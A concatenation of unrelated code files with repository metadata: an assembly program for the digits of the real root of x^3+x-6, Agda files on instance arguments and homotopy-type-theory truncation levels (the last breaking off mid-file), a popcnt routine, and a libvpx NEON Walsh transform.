<gh_stars>10-100 ; A257235: Decimal expansion of the real root of x^3 + x - 6. ; Submitted by <NAME> ; 1,6,3,4,3,6,5,2,9,3,0,1,3,5,4,3,3,2,3,3,6,8,2,8,4,4,5,6,9,7,8,2,5,2,2,1,0,3,3,7,2,0,4,7,0,3,7,5,4,0,4,7,2,8,1,7,6,9,5,7,4,6,1,2,9,6,2,2,3,1,7,7,9,3,3,3,5,7,3,4,8,6,1,2,0,4,6,1,2,4,9,3,7,9,0,8,8 mov $2,1 mov $3,$0 mul $3,4 lpb $3 add $1,$2 add $5,$2 add $1,$5 add $2,$1 mul $1,2 sub $2,$5 sub $3,1 lpe mov $1,1 add $1,$5 mov $4,10 pow $4,$0 mul $4,2 div $2,$4 lpb $2 mov $6,$2 cmp $6,0 add $2,$6 div $1,$2 mod $2,9 lpe mov $0,$1 mod $0,10

examples/instance-arguments/05-equality-std1.agda

larrytheliquid/agda

0

420

<gh_stars>0 {-# OPTIONS --universe-polymorphism #-} -- {-# OPTIONS --verbose tc.records.ifs:15 #-} -- {-# OPTIONS --verbose tc.constr.findInScope:15 #-} -- {-# OPTIONS --verbose tc.term.args.ifs:15 #-} module 05-equality-std1 where open import Relation.Binary using (IsDecEquivalence; module IsDecEquivalence; Reflexive; module DecSetoid) open import Data.Bool using (false; true; decSetoid) open DecSetoid decSetoid using (isDecEquivalence) open module IsDecEquivalenceWithImplicits = IsDecEquivalence {{...}} using (_≟_) test = false ≟ true test2 : ∀ {a ℓ} {A : Set a} {_≈_} → {{ide : IsDecEquivalence {a} {ℓ} {A} _≈_}} → Reflexive _≈_ test2 = IsDecEquivalenceWithImplicits.refl

popcnt.asm

moskupols/competitive-stl-extensions

3

240259

main: xor eax, eax popcnt eax, edi ret

videocodec/libvpx_internal/libvpx/vp8/encoder/arm/neon/vp8_shortwalsh4x4_neon.asm

Omegaphora/hardware_intel_common_omx-components

49

23283

; ; Copyright (c) 2010 The WebM project authors. All Rights Reserved. ; ; Use of this source code is governed by a BSD-style license ; that can be found in the LICENSE file in the root of the source ; tree. An additional intellectual property rights grant can be found ; in the file PATENTS. All contributing project authors may ; be found in the AUTHORS file in the root of the source tree. ; EXPORT |vp8_short_walsh4x4_neon| ARM REQUIRE8 PRESERVE8 AREA ||.text||, CODE, READONLY, ALIGN=2 ;void vp8_short_walsh4x4_neon(short *input, short *output, int pitch) ; r0 short *input, ; r1 short *output, ; r2 int pitch |vp8_short_walsh4x4_neon| PROC vld1.16 {d0}, [r0@64], r2 ; load input vld1.16 {d1}, [r0@64], r2 vld1.16 {d2}, [r0@64], r2 vld1.16 {d3}, [r0@64] ;First for-loop ;transpose d0, d1, d2, d3. Then, d0=ip[0], d1=ip[1], d2=ip[2], d3=ip[3] vtrn.32 d0, d2 vtrn.32 d1, d3 vmov.s32 q15, #3 ; add 3 to all values vtrn.16 d0, d1 vtrn.16 d2, d3 vadd.s16 d4, d0, d2 ; ip[0] + ip[2] vadd.s16 d5, d1, d3 ; ip[1] + ip[3] vsub.s16 d6, d1, d3 ; ip[1] - ip[3] vsub.s16 d7, d0, d2 ; ip[0] - ip[2] vshl.s16 d4, d4, #2 ; a1 = (ip[0] + ip[2]) << 2 vshl.s16 d5, d5, #2 ; d1 = (ip[1] + ip[3]) << 2 vshl.s16 d6, d6, #2 ; c1 = (ip[1] - ip[3]) << 2 vceq.s16 d16, d4, #0 ; a1 == 0 vshl.s16 d7, d7, #2 ; b1 = (ip[0] - ip[2]) << 2 vadd.s16 d0, d4, d5 ; a1 + d1 vmvn d16, d16 ; a1 != 0 vsub.s16 d3, d4, d5 ; op[3] = a1 - d1 vadd.s16 d1, d7, d6 ; op[1] = b1 + c1 vsub.s16 d2, d7, d6 ; op[2] = b1 - c1 vsub.s16 d0, d0, d16 ; op[0] = a1 + d1 + (a1 != 0) ;Second for-loop ;transpose d0, d1, d2, d3, Then, d0=ip[0], d1=ip[4], d2=ip[8], d3=ip[12] vtrn.32 d1, d3 vtrn.32 d0, d2 vtrn.16 d2, d3 vtrn.16 d0, d1 vaddl.s16 q8, d0, d2 ; a1 = ip[0]+ip[8] vaddl.s16 q9, d1, d3 ; d1 = ip[4]+ip[12] vsubl.s16 q10, d1, d3 ; c1 = ip[4]-ip[12] vsubl.s16 q11, d0, d2 ; b1 = ip[0]-ip[8] vadd.s32 q0, q8, q9 ; a2 = a1 + d1 vadd.s32 q1, q11, q10 ; b2 = b1 + c1 vsub.s32 q2, q11, q10 ; c2 = b1 - c1 vsub.s32 q3, q8, q9 ; d2 = a1 - d1 vclt.s32 q8, q0, #0 vclt.s32 q9, q1, #0 vclt.s32 q10, q2, #0 vclt.s32 q11, q3, #0 ; subtract -1 (or 0) vsub.s32 q0, q0, q8 ; a2 += a2 < 0 vsub.s32 q1, q1, q9 ; b2 += b2 < 0 vsub.s32 q2, q2, q10 ; c2 += c2 < 0 vsub.s32 q3, q3, q11 ; d2 += d2 < 0 vadd.s32 q8, q0, q15 ; a2 + 3 vadd.s32 q9, q1, q15 ; b2 + 3 vadd.s32 q10, q2, q15 ; c2 + 3 vadd.s32 q11, q3, q15 ; d2 + 3 ; vrshrn? would add 1 << 3-1 = 2 vshrn.s32 d0, q8, #3 vshrn.s32 d1, q9, #3 vshrn.s32 d2, q10, #3 vshrn.s32 d3, q11, #3 vst1.16 {q0, q1}, [r1@128] bx lr ENDP END

Agda/10-truncation-levels.agda

hemangandhi/HoTT-Intro

0

3185

{-# OPTIONS --without-K --exact-split #-} module 10-truncation-levels where import 09-fundamental-theorem open 09-fundamental-theorem public -- Section 8.1 Propositions is-prop : {i : Level} (A : UU i) → UU i is-prop A = (x y : A) → is-contr (Id x y) {- We introduce the universe of all propositions. -} UU-Prop : (l : Level) → UU (lsuc l) UU-Prop l = Σ (UU l) is-prop type-Prop : {l : Level} → UU-Prop l → UU l type-Prop P = pr1 P is-prop-type-Prop : {l : Level} (P : UU-Prop l) → is-prop (type-Prop P) is-prop-type-Prop P = pr2 P {- The empty type is a proposition. -} abstract is-prop-empty : is-prop empty is-prop-empty () abstract is-prop-unit : is-prop unit is-prop-unit = is-prop-is-contr is-contr-unit unit-Prop : UU-Prop lzero unit-Prop = pair unit is-prop-unit is-prop' : {i : Level} (A : UU i) → UU i is-prop' A = (x y : A) → Id x y abstract is-prop-is-prop' : {i : Level} {A : UU i} → is-prop' A → is-prop A is-prop-is-prop' {i} {A} H x y = pair ( (inv (H x x)) ∙ (H x y)) ( ind-Id x ( λ z p → Id ((inv (H x x)) ∙ (H x z)) p) ( left-inv (H x x)) y) abstract is-prop'-is-prop : {i : Level} {A : UU i} → is-prop A → is-prop' A is-prop'-is-prop H x y = pr1 (H x y) abstract is-contr-is-prop-inh : {i : Level} {A : UU i} → is-prop A → A → is-contr A is-contr-is-prop-inh H a = pair a (is-prop'-is-prop H a) abstract is-prop-is-contr-if-inh : {i : Level} {A : UU i} → (A → is-contr A) → is-prop A is-prop-is-contr-if-inh H x y = is-prop-is-contr (H x) x y is-subtype : {i j : Level} {A : UU i} (B : A → UU j) → UU (i ⊔ j) is-subtype B = (x : _) → is-prop (B x) double-structure-swap : {l1 l2 l3 : Level} (A : UU l1) (B : A → UU l2) (C : A → UU l3) → Σ (Σ A B) (λ t → C (pr1 t)) → Σ (Σ A C) (λ t → B (pr1 t)) double-structure-swap A B C (pair (pair a b) c) = (pair (pair a c) b) htpy-double-structure-swap : {l1 l2 l3 : Level} (A : UU l1) (B : A → UU l2) (C : A → UU l3) → ((double-structure-swap A C B) ∘ (double-structure-swap A B C)) ~ id htpy-double-structure-swap A B C (pair (pair a b) c) = eq-pair (eq-pair refl refl) refl is-equiv-double-structure-swap : {l1 l2 l3 : Level} (A : UU l1) (B : A → UU l2) (C : A → UU l3) → is-equiv (double-structure-swap A B C) is-equiv-double-structure-swap A B C = is-equiv-has-inverse ( double-structure-swap A C B) ( htpy-double-structure-swap A C B) ( htpy-double-structure-swap A B C) {- The following is a general construction that will help us show that the identity type of a subtype agrees with the identity type of the original type. We already know that the first projection of a family of propositions is an embedding, but the following lemma still has its uses. -} abstract is-contr-total-Eq-substructure : {l1 l2 l3 : Level} {A : UU l1} {B : A → UU l2} {P : A → UU l3} → is-contr (Σ A B) → (is-subtype P) → (a : A) (b : B a) (p : P a) → is-contr (Σ (Σ A P) (λ t → B (pr1 t))) is-contr-total-Eq-substructure {A = A} {B} {P} is-contr-AB is-subtype-P a b p = is-contr-is-equiv ( Σ (Σ A B) (λ t → P (pr1 t))) ( double-structure-swap A P B) ( is-equiv-double-structure-swap A P B) ( is-contr-is-equiv' ( P a) ( left-unit-law-Σ-map-gen (λ t → P (pr1 t)) is-contr-AB (pair a b)) ( is-equiv-left-unit-law-Σ-map-gen _ is-contr-AB (pair a b)) ( is-contr-is-prop-inh (is-subtype-P a) p)) Eq-total-subtype : {l1 l2 : Level} {A : UU l1} {B : A → UU l2} → is-subtype B → (Σ A B) → (Σ A B) → UU l1 Eq-total-subtype is-subtype-B p p' = Id (pr1 p) (pr1 p') reflexive-Eq-total-subtype : {l1 l2 : Level} {A : UU l1} {B : A → UU l2} (is-subtype-B : is-subtype B) → (p : Σ A B) → Eq-total-subtype is-subtype-B p p reflexive-Eq-total-subtype is-subtype-B (pair x y) = refl Eq-total-subtype-eq : {l1 l2 : Level} {A : UU l1} {B : A → UU l2} (is-subtype-B : is-subtype B) → (p p' : Σ A B) → Id p p' → Eq-total-subtype is-subtype-B p p' Eq-total-subtype-eq is-subtype-B p .p refl = reflexive-Eq-total-subtype is-subtype-B p is-contr-total-Eq-total-subtype : {l1 l2 : Level} {A : UU l1} {B : A → UU l2} (is-subtype-B : is-subtype B) → (p : Σ A B) → is-contr (Σ (Σ A B) (Eq-total-subtype is-subtype-B p)) is-contr-total-Eq-total-subtype is-subtype-B (pair x y) = is-contr-total-Eq-substructure ( is-contr-total-path x) ( is-subtype-B) x refl y is-equiv-Eq-total-subtype-eq : {l1 l2 : Level} {A : UU l1} {B : A → UU l2} (is-subtype-B : is-subtype B) → (p p' : Σ A B) → is-equiv (Eq-total-subtype-eq is-subtype-B p p') is-equiv-Eq-total-subtype-eq is-subtype-B p = fundamental-theorem-id p ( reflexive-Eq-total-subtype is-subtype-B p) ( is-contr-total-Eq-total-subtype is-subtype-B p) ( Eq-total-subtype-eq is-subtype-B p) eq-subtype : {l1 l2 : Level} {A : UU l1} {B : A → UU l2} (is-subtype-B : is-subtype B) → {p p' : Σ A B} → Eq-total-subtype is-subtype-B p p' → Id p p' eq-subtype is-subtype-B {p} {p'} = inv-is-equiv (is-equiv-Eq-total-subtype-eq is-subtype-B p p') -- Section 8.2 Sets is-set : {i : Level} → UU i → UU i is-set A = (x y : A) → is-prop (Id x y) UU-Set : (i : Level) → UU (lsuc i) UU-Set i = Σ (UU i) is-set type-Set : {l : Level} → UU-Set l → UU l type-Set X = pr1 X is-set-type-Set : {l : Level} (X : UU-Set l) → is-set (type-Set X) is-set-type-Set X = pr2 X axiom-K : {i : Level} → UU i → UU i axiom-K A = (x : A) (p : Id x x) → Id refl p abstract is-set-axiom-K : {i : Level} (A : UU i) → axiom-K A → is-set A is-set-axiom-K A H x y = is-prop-is-prop' (ind-Id x (λ z p → (q : Id x z) → Id p q) (H x) y) abstract axiom-K-is-set : {i : Level} (A : UU i) → is-set A → axiom-K A axiom-K-is-set A H x p = ( inv (contraction (is-contr-is-prop-inh (H x x) refl) refl)) ∙ ( contraction (is-contr-is-prop-inh (H x x) refl) p) abstract is-equiv-prop-in-id : {i j : Level} {A : UU i} (R : A → A → UU j) (p : (x y : A) → is-prop (R x y)) (ρ : (x : A) → R x x) (i : (x y : A) → R x y → Id x y) → (x y : A) → is-equiv (i x y) is-equiv-prop-in-id R p ρ i x = fundamental-theorem-id-retr x (i x) (λ y → pair (ind-Id x (λ z p → R x z) (ρ x) y) ((λ r → is-prop'-is-prop (p x y) _ r))) abstract is-prop-is-equiv : {i j : Level} {A : UU i} (B : UU j) (f : A → B) (E : is-equiv f) → is-prop B → is-prop A is-prop-is-equiv B f E H x y = is-contr-is-equiv _ (ap f {x} {y}) (is-emb-is-equiv f E x y) (H (f x) (f y)) abstract is-prop-is-equiv' : {i j : Level} (A : UU i) {B : UU j} (f : A → B) (E : is-equiv f) → is-prop A → is-prop B is-prop-is-equiv' A f E H = is-prop-is-equiv _ (inv-is-equiv E) (is-equiv-inv-is-equiv E) H abstract is-set-prop-in-id : {i j : Level} {A : UU i} (R : A → A → UU j) (p : (x y : A) → is-prop (R x y)) (ρ : (x : A) → R x x) (i : (x y : A) → R x y → Id x y) → is-set A is-set-prop-in-id R p ρ i x y = is-prop-is-equiv' ( R x y) ( i x y) ( is-equiv-prop-in-id R p ρ i x y) (p x y) abstract is-prop-Eq-ℕ : (n m : ℕ) → is-prop (Eq-ℕ n m) is-prop-Eq-ℕ zero-ℕ zero-ℕ = is-prop-unit is-prop-Eq-ℕ zero-ℕ (succ-ℕ m) = is-prop-empty is-prop-Eq-ℕ (succ-ℕ n) zero-ℕ = is-prop-empty is-prop-Eq-ℕ (succ-ℕ n) (succ-ℕ m) = is-prop-Eq-ℕ n m abstract eq-Eq-ℕ : (n m : ℕ) → Eq-ℕ n m → Id n m eq-Eq-ℕ = least-reflexive-Eq-ℕ Id (λ n → refl) abstract is-set-ℕ : is-set ℕ is-set-ℕ = is-set-prop-in-id Eq-ℕ is-prop-Eq-ℕ refl-Eq-ℕ eq-Eq-ℕ set-ℕ : UU-Set lzero set-ℕ = pair ℕ is-set-ℕ -- Section 8.3 General truncation levels data 𝕋 : UU lzero where neg-two-𝕋 : 𝕋 succ-𝕋 : 𝕋 → 𝕋 neg-one-𝕋 : 𝕋 neg-one-𝕋 = succ-𝕋 (neg-two-𝕋) zero-𝕋 : 𝕋 zero-𝕋 = succ-𝕋 (neg-one-𝕋) one-𝕋 : 𝕋 one-𝕋 = succ-𝕋 (zero-𝕋) ℕ-in-𝕋 : ℕ → 𝕋 ℕ-in-𝕋 zero-ℕ = zero-𝕋 ℕ-in-𝕋 (succ-ℕ n) = succ-𝕋 (ℕ-in-𝕋 n) -- Probably it is better to define this where we first need it. add-𝕋 : 𝕋 → 𝕋 → 𝕋 add-𝕋 neg-two-𝕋 neg-two-𝕋 = neg-two-𝕋 add-𝕋 neg-two-𝕋 (succ-𝕋 neg-two-𝕋) = neg-two-𝕋 add-𝕋 neg-two-𝕋 (succ-𝕋 (succ-𝕋 y)) = y add-𝕋 (succ-𝕋 neg-two-𝕋) neg-two-𝕋 = neg-two-𝕋 add-𝕋 (succ-𝕋 neg-two-𝕋) (succ-𝕋 y) = y add-𝕋 (succ-𝕋 (succ-𝕋 neg-two-𝕋)) y = y add-𝕋 (succ-𝕋 (succ-𝕋 (succ-𝕋 x))) y = succ-𝕋 (add-𝕋 (succ-𝕋 (succ-𝕋 x)) y) is-trunc : {i : Level} (k : 𝕋) → UU i → UU i is-trunc neg-two-𝕋 A = is-contr A is-trunc (succ-𝕋 k) A = (x y : A) → is-trunc k (Id x y) 1-type : (l : Level) → UU (lsuc l) 1-type l = Σ (UU l) (is-trunc one-𝕋) _Truncated-Type_ : 𝕋 → (l : Level) → UU (lsuc l) k Truncated-Type l = Σ (UU l) (is-trunc k) abstract is-trunc-succ-is-trunc : {i : Level} (k : 𝕋) (A : UU i) → is-trunc k A → is-trunc (succ-𝕋 k) A is-trunc-succ-is-trunc neg-two-𝕋 A H = is-prop-is-contr H is-trunc-succ-is-trunc (succ-𝕋 k) A H x y = is-trunc-succ-is-trunc k (Id x y) (H x y) truncated-type-succ-𝕋 : (l : Level) (k : 𝕋) → k Truncated-Type l → (succ-𝕋 k) Truncated-Type l truncated-type-succ-𝕋 l k (pair A is-trunc-A) = pair A (is-trunc-succ-is-trunc k A is-trunc-A) abstract is-trunc-is-equiv : {i j : Level} (k : 𝕋) {A : UU i} (B : UU j) (f : A → B) → is-equiv f → is-trunc k B → is-trunc k A is-trunc-is-equiv neg-two-𝕋 B f is-equiv-f H = is-contr-is-equiv B f is-equiv-f H is-trunc-is-equiv (succ-𝕋 k) B f is-equiv-f H x y = is-trunc-is-equiv k (Id (f x) (f y)) (ap f {x} {y}) (is-emb-is-equiv f is-equiv-f x y) (H (f x) (f y)) abstract is-set-is-equiv : {i j : Level} {A : UU i} (B : UU j) (f : A → B) → is-equiv f → is-set B → is-set A is-set-is-equiv = is-trunc-is-equiv zero-𝕋 abstract is-trunc-equiv : {i j : Level} (k : 𝕋) {A : UU i} (B : UU j) (e : A ≃ B) → is-trunc k B → is-trunc k A is-trunc-equiv k B (pair f is-equiv-f) = is-trunc-is-equiv k B f is-equiv-f abstract is-set-equiv : {i j : Level} {A : UU i} (B : UU j) (e : A ≃ B) → is-set B → is-set A is-set-equiv = is-trunc-equiv zero-𝕋 abstract is-trunc-is-equiv' : {i j : Level} (k : 𝕋) (A : UU i) {B : UU j} (f : A → B) → is-equiv f → is-trunc k A → is-trunc k B is-trunc-is-equiv' k A f is-equiv-f is-trunc-A = is-trunc-is-equiv k A ( inv-is-equiv is-equiv-f) ( is-equiv-inv-is-equiv is-equiv-f) ( is-trunc-A) abstract is-set-is-equiv' : {i j : Level} (A : UU i) {B : UU j} (f : A → B) → is-equiv f → is-set A → is-set B is-set-is-equiv' = is-trunc-is-equiv' zero-𝕋 abstract is-trunc-equiv' : {i j : Level} (k : 𝕋) (A : UU i) {B : UU j} (e : A ≃ B) → is-trunc k A → is-trunc k B is-trunc-equiv' k A (pair f is-equiv-f) = is-trunc-is-equiv' k A f is-equiv-f abstract is-set-equiv' : {i j : Level} (A : UU i) {B : UU j} (e : A ≃ B) → is-set A → is-set B is-set-equiv' = is-trunc-equiv' zero-𝕋 abstract is-trunc-succ-is-emb : {i j : Level} (k : 𝕋) {A : UU i} {B : UU j} (f : A → B) → is-emb f → is-trunc (succ-𝕋 k) B → is-trunc (succ-𝕋 k) A is-trunc-succ-is-emb k f Ef H x y = is-trunc-is-equiv k (Id (f x) (f y)) (ap f {x} {y}) (Ef x y) (H (f x) (f y)) is-trunc-map : {i j : Level} (k : 𝕋) {A : UU i} {B : UU j} → (A → B) → UU (i ⊔ j) is-trunc-map k f = (y : _) → is-trunc k (fib f y) trunc-map : {i j : Level} (k : 𝕋) (A : UU i) (B : UU j) → UU (i ⊔ j) trunc-map k A B = Σ (A → B) (is-trunc-map k) abstract is-trunc-pr1-is-trunc-fam : {i j : Level} (k : 𝕋) {A : UU i} (B : A → UU j) → ((x : A) → is-trunc k (B x)) → is-trunc-map k (pr1 {i} {j} {A} {B}) is-trunc-pr1-is-trunc-fam k B H x = is-trunc-is-equiv k ( B x) ( fib-fam-fib-pr1 B x) ( is-equiv-fib-fam-fib-pr1 B x) ( H x) trunc-pr1 : {i j : Level} (k : 𝕋) {A : UU i} (B : A → k Truncated-Type j) → trunc-map k (Σ A (λ x → pr1 (B x))) A trunc-pr1 k B = pair pr1 (is-trunc-pr1-is-trunc-fam k (λ x → pr1 (B x)) (λ x → pr2 (B x))) abstract is-trunc-fam-is-trunc-pr1 : {i j : Level} (k : 𝕋) {A : UU i} (B : A → UU j) → is-trunc-map k (pr1 {i} {j} {A} {B}) → ((x : A) → is-trunc k (B x)) is-trunc-fam-is-trunc-pr1 k B is-trunc-pr1 x = is-trunc-is-equiv k ( fib pr1 x) ( fib-pr1-fib-fam B x) ( is-equiv-fib-pr1-fib-fam B x) ( is-trunc-pr1 x) abstract is-trunc-map-is-trunc-ap : {i j : Level} (k : 𝕋) {A : UU i} {B : UU j} (f : A → B) → ((x y : A) → is-trunc-map k (ap f {x = x} {y = y})) → is-trunc-map (succ-𝕋 k) f is-trunc-map-is-trunc-ap k f is-trunc-ap-f b (pair x p) (pair x' p') = is-trunc-is-equiv k ( fib (ap f) (p ∙ (inv p'))) ( fib-ap-eq-fib f (pair x p) (pair x' p')) ( is-equiv-fib-ap-eq-fib f (pair x p) (pair x' p')) ( is-trunc-ap-f x x' (p ∙ (inv p'))) abstract is-trunc-ap-is-trunc-map : {i j : Level} (k : 𝕋) {A : UU i} {B : UU j} (f : A → B) → is-trunc-map (succ-𝕋 k) f → (x y : A) → is-trunc-map k (ap f {x = x} {y = y}) is-trunc-ap-is-trunc-map k f is-trunc-map-f x y p = is-trunc-is-equiv' k ( Id (pair x p) (pair y refl)) ( eq-fib-fib-ap f x y p) ( is-equiv-eq-fib-fib-ap f x y p) ( is-trunc-map-f (f y) (pair x p) (pair y refl)) is-prop-map : {i j : Level} {A : UU i} {B : UU j} (f : A → B) → UU (i ⊔ j) is-prop-map f = (b : _) → is-trunc neg-one-𝕋 (fib f b) abstract is-emb-is-prop-map : {i j : Level} {A : UU i} {B : UU j} (f : A → B) → is-prop-map f → is-emb f is-emb-is-prop-map f is-prop-map-f x y = is-equiv-is-contr-map ( is-trunc-ap-is-trunc-map neg-two-𝕋 f is-prop-map-f x y) abstract is-prop-map-is-emb : {i j : Level} {A : UU i} {B : UU j} (f : A → B) → is-emb f → is-prop-map f is-prop-map-is-emb f is-emb-f = is-trunc-map-is-trunc-ap neg-two-𝕋 f ( λ x y → is-contr-map-is-equiv (is-emb-f x y)) abstract is-emb-pr1-is-subtype : {i j : Level} {A : UU i} {B : A → UU j} → is-subtype B → is-emb (pr1 {B = B}) is-emb-pr1-is-subtype {B = B} is-subtype-B = is-emb-is-prop-map pr1 ( λ x → is-trunc-is-equiv neg-one-𝕋 ( B x) ( fib-fam-fib-pr1 _ x) ( is-equiv-fib-fam-fib-pr1 _ x) ( is-subtype-B x)) equiv-ap-pr1-is-subtype : {i j : Level} {A : UU i} {B : A → UU j} → is-subtype B → {s t : Σ A B} → Id s t ≃ Id (pr1 s) (pr1 t) equiv-ap-pr1-is-subtype is-subtype-B {s} {t} = pair ( ap pr1) ( is-emb-pr1-is-subtype is-subtype-B s t) abstract is-subtype-is-emb-pr1 : {i j : Level} {A : UU i} {B : A → UU j} → is-emb (pr1 {B = B}) → is-subtype B is-subtype-is-emb-pr1 is-emb-pr1-B x = is-trunc-is-equiv neg-one-𝕋 ( fib pr1 x) ( fib-pr1-fib-fam _ x) ( is-equiv-fib-pr1-fib-fam _ x) ( is-prop-map-is-emb pr1 is-emb-pr1-B x) is-fiberwise-trunc : {l1 l2 l3 : Level} (k : 𝕋) {A : UU l1} {B : A → UU l2} {C : A → UU l3} (f : (x : A) → B x → C x) → UU (l1 ⊔ (l2 ⊔ l3)) is-fiberwise-trunc k f = (x : _) → is-trunc-map k (f x) abstract is-trunc-tot-is-fiberwise-trunc : {l1 l2 l3 : Level} (k : 𝕋) {A : UU l1} {B : A → UU l2} {C : A → UU l3} (f : (x : A) → B x → C x) → is-fiberwise-trunc k f → is-trunc-map k (tot f) is-trunc-tot-is-fiberwise-trunc k f is-fiberwise-trunc-f (pair x z) = is-trunc-is-equiv k ( fib (f x) z) ( fib-ftr-fib-tot f (pair x z)) ( is-equiv-fib-ftr-fib-tot f (pair x z)) ( is-fiberwise-trunc-f x z) abstract is-fiberwise-trunc-is-trunc-tot : {l1 l2 l3 : Level} (k : 𝕋) {A : UU l1} {B : A → UU l2} {C : A → UU l3} (f : (x : A) → B x → C x) → is-trunc-map k (tot f) → is-fiberwise-trunc k f is-fiberwise-trunc-is-trunc-tot k f is-trunc-tot-f x z = is-trunc-is-equiv k ( fib (tot f) (pair x z)) ( fib-tot-fib-ftr f (pair x z)) ( is-equiv-fib-tot-fib-ftr f (pair x z)) ( is-trunc-tot-f (pair x z)) -- Exercises -- Exercise 8.1 -- Exercise 8.1 diagonal : {l : Level} (A : UU l) → A → A × A diagonal A x = pair x x abstract is-prop-is-equiv-diagonal : {l : Level} (A : UU l) → is-equiv (diagonal A) → is-prop A is-prop-is-equiv-diagonal A is-equiv-d = is-prop-is-prop' ( λ x y → let α = issec-inv-is-equiv is-equiv-d (pair x y) in ( inv (ap pr1 α)) ∙ (ap pr2 α)) eq-fib-diagonal : {l : Level} (A : UU l) (t : A × A) → fib (diagonal A) t → Id (pr1 t) (pr2 t) eq-fib-diagonal A (pair x y) (pair z α) = (inv (ap pr1 α)) ∙ (ap pr2 α) fib-diagonal-eq : {l : Level} (A : UU l) (t : A × A) → Id (pr1 t) (pr2 t) → fib (diagonal A) t fib-diagonal-eq A (pair x y) β = pair x (eq-pair-triv (pair refl β)) issec-fib-diagonal-eq : {l : Level} (A : UU l) (t : A × A) → ((eq-fib-diagonal A t) ∘ (fib-diagonal-eq A t)) ~ id issec-fib-diagonal-eq A (pair x .x) refl = refl isretr-fib-diagonal-eq : {l : Level} (A : UU l) (t : A × A) → ((fib-diagonal-eq A t) ∘ (eq-fib-diagonal A t)) ~ id isretr-fib-diagonal-eq A .(pair z z) (pair z refl) = refl abstract is-equiv-eq-fib-diagonal : {l : Level} (A : UU l) (t : A × A) → is-equiv (eq-fib-diagonal A t) is-equiv-eq-fib-diagonal A t = is-equiv-has-inverse ( fib-diagonal-eq A t) ( issec-fib-diagonal-eq A t) ( isretr-fib-diagonal-eq A t) abstract is-trunc-is-trunc-diagonal : {l : Level} (k : 𝕋) (A : UU l) → is-trunc-map k (diagonal A) → is-trunc (succ-𝕋 k) A is-trunc-is-trunc-diagonal k A is-trunc-d x y = is-trunc-is-equiv' k ( fib (diagonal A) (pair x y)) ( eq-fib-diagonal A (pair x y)) ( is-equiv-eq-fib-diagonal A (pair x y)) ( is-trunc-d (pair x y)) abstract is-trunc-diagonal-is-trunc : {l : Level} (k : 𝕋) (A : UU l) → is-trunc (succ-𝕋 k) A → is-trunc-map k (diagonal A) is-trunc-diagonal-is-trunc k A is-trunc-A t = is-trunc-is-equiv k ( Id (pr1 t) (pr2 t)) ( eq-fib-diagonal A t) ( is-equiv-eq-fib-diagonal A t) ( is-trunc-A (pr1 t) (pr2 t)) -- Exercise 8.2 -- Exercise 8.2(a) abstract is-trunc-Σ : {l1 l2 : Level} (k : 𝕋) {A : UU l1} {B : A → UU l2} → is-trunc k A → ((x : A) → is-trunc k (B x)) → is-trunc k (Σ A B) is-trunc-Σ neg-two-𝕋 is-trunc-A is-trunc-B = is-contr-Σ is-trunc-A is-trunc-B is-trunc-Σ (succ-𝕋 k) {B = B} is-trunc-A is-trunc-B s t = is-trunc-is-equiv k ( Σ (Id (pr1 s) (pr1 t)) (λ p → Id (tr B p (pr2 s)) (pr2 t))) ( pair-eq) ( is-equiv-pair-eq s t) ( is-trunc-Σ k ( is-trunc-A (pr1 s) (pr1 t)) ( λ p → is-trunc-B (pr1 t) (tr B p (pr2 s)) (pr2 t))) abstract is-trunc-prod : {l1 l2 : Level} (k : 𝕋) {A : UU l1} {B : UU l2} → is-trunc k A → is-trunc k B → is-trunc k (A × B) is-trunc-prod k is-trunc-A is-trunc-B = is-trunc-Σ k is-trunc-A (λ x → is-trunc-B) abstract is-prop-Σ : {l1 l2 : Level} {A : UU l1} {B : A → UU l2} → is-prop A → is-subtype B → is-prop (Σ A B) is-prop-Σ = is-trunc-Σ neg-one-𝕋 Σ-Prop : {l1 l2 : Level} (P : UU-Prop l1) (Q : type-Prop P → UU-Prop l2) → UU-Prop (l1 ⊔ l2) Σ-Prop P Q = pair ( Σ (type-Prop P) (λ p → type-Prop (Q p))) ( is-prop-Σ ( is-prop-type-Prop P) ( λ p → is-prop-type-Prop (Q p))) abstract is-prop-prod : {l1 l2 : Level} {A : UU l1} {B : UU l2} → is-prop A → is-prop B → is-prop (A × B) is-prop-prod = is-trunc-prod neg-one-𝕋 prod-Prop : {l1 l2 : Level} → UU-Prop l1 → UU-Prop l2 → UU-Prop (l1 ⊔ l2) prod-Prop P Q = pair ( type-Prop P × type-Prop Q) ( is-prop-prod (is-prop-type-Prop P) (is-prop-type-Prop Q)) abstract is-set-Σ : {l1 l2 : Level} {A : UU l1} {B : A → UU l2} → is-set A → ((x : A) → is-set (B x)) → is-set (Σ A B) is-set-Σ = is-trunc-Σ zero-𝕋 set-Σ : {l1 l2 : Level} (A : UU-Set l1) (B : pr1 A → UU-Set l2) → UU-Set (l1 ⊔ l2) set-Σ (pair A is-set-A) B = pair ( Σ A (λ x → (pr1 (B x)))) ( is-set-Σ is-set-A (λ x → pr2 (B x))) abstract is-set-prod : {l1 l2 : Level} {A : UU l1} {B : UU l2} → is-set A → is-set B → is-set (A × B) is-set-prod = is-trunc-prod zero-𝕋 set-prod : {l1 l2 : Level} (A : UU-Set l1) (B : UU-Set l2) → UU-Set (l1 ⊔ l2) set-prod (pair A is-set-A) (pair B is-set-B) = pair (A × B) (is-set-prod is-set-A is-set-B) -- Exercise 8.2 (b) abstract is-trunc-Id : {l : Level} (k : 𝕋) {A : UU l} → is-trunc k A → (x y : A) → is-trunc k (Id x y) is-trunc-Id neg-two-𝕋 is-trunc-A = is-prop-is-contr is-trunc-A is-trunc-Id (succ-𝕋 k) is-trunc-A x y = is-trunc-succ-is-trunc k (Id x y) (is-trunc-A x y) -- Exercise 8.2 (c) abstract is-trunc-map-is-trunc-domain-codomain : {l1 l2 : Level} (k : 𝕋) {A : UU l1} {B : UU l2} {f : A → B} → is-trunc k A → is-trunc k B → is-trunc-map k f is-trunc-map-is-trunc-domain-codomain k {f = f} is-trunc-A is-trunc-B b = is-trunc-Σ k is-trunc-A (λ x → is-trunc-Id k is-trunc-B (f x) b) -- Exercise 8.2 (d) abstract is-trunc-fam-is-trunc-Σ : {l1 l2 : Level} (k : 𝕋) {A : UU l1} {B : A → UU l2} → is-trunc k A → is-trunc k (Σ A B) → (x : A) → is-trunc k (B x) is-trunc-fam-is-trunc-Σ k {B = B} is-trunc-A is-trunc-ΣAB x = is-trunc-is-equiv' k ( fib pr1 x) ( fib-fam-fib-pr1 B x) ( is-equiv-fib-fam-fib-pr1 B x) ( is-trunc-map-is-trunc-domain-codomain k is-trunc-ΣAB is-trunc-A x) -- Exercise 